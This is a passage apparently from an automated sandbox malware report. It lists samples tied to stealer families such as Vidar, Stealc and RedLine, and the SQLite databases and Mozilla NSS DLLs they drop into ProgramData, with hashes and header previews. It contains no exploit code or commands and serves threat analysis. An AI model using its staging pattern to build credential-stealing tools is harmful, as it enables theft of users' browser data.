                                                                                                                                                                                                                                                        • 184.30.122.179
                                                                                                                                                                                                                                                        eOU2MVDmTd.exeGet hashmaliciousCredGrabber, Meduza Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                        • 184.30.122.179
                                                                                                                                                                                                                                                        SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                                        • 184.30.122.179
                                                                                                                                                                                                                                                        UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                                                                        • 184.30.122.179
                                                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.30.122.179
                                                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.30.122.179
                                                                                                                                                                                                                                                        POTWIERDZENIE_TRANSAKCJI_20240418145856.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                        • 184.30.122.179
                                                                                                                                                                                                                                                        eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                        • 184.30.122.179
                                                                                                                                                                                                                                                        SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                        • 184.30.122.179
                                                                                                                                                                                                                                                        SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                        • 184.30.122.179

                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        C:\ProgramData\freebl3.dllSecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              LXoASvZRu1.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                nXXx6yL69w.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                                    Gpeym6icI3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        dc8laldmc8.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          LB4129B9YX.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                            C:\ProgramData\mozglue.dllSecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  LXoASvZRu1.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                    nXXx6yL69w.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                      SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                        Gpeym6icI3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                            dc8laldmc8.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                              LB4129B9YX.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse

                                                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                                                C:\ProgramData\CAFHIJDH

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\DBFCBGCG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\DBFCBGCGIJKJKECAKEGC

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\FHCBGDAAFBKEBGDHDBKECAEBGH

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\GDAAKFIDGIEGDGDHIDAK

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\GDHIEHJE

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\GHJDBAKE

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\GIIJEBAECGCBKECAAAEBFBGHJJ

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\JJJDGIECFCAKKFHIIIJEGDHIIE

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                • Filename: SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: LXoASvZRu1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: nXXx6yL69w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: Gpeym6icI3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: dc8laldmc8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: LB4129B9YX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                • Filename: SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: LXoASvZRu1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: nXXx6yL69w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: Gpeym6icI3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: dc8laldmc8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: LB4129B9YX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                                                                Download File
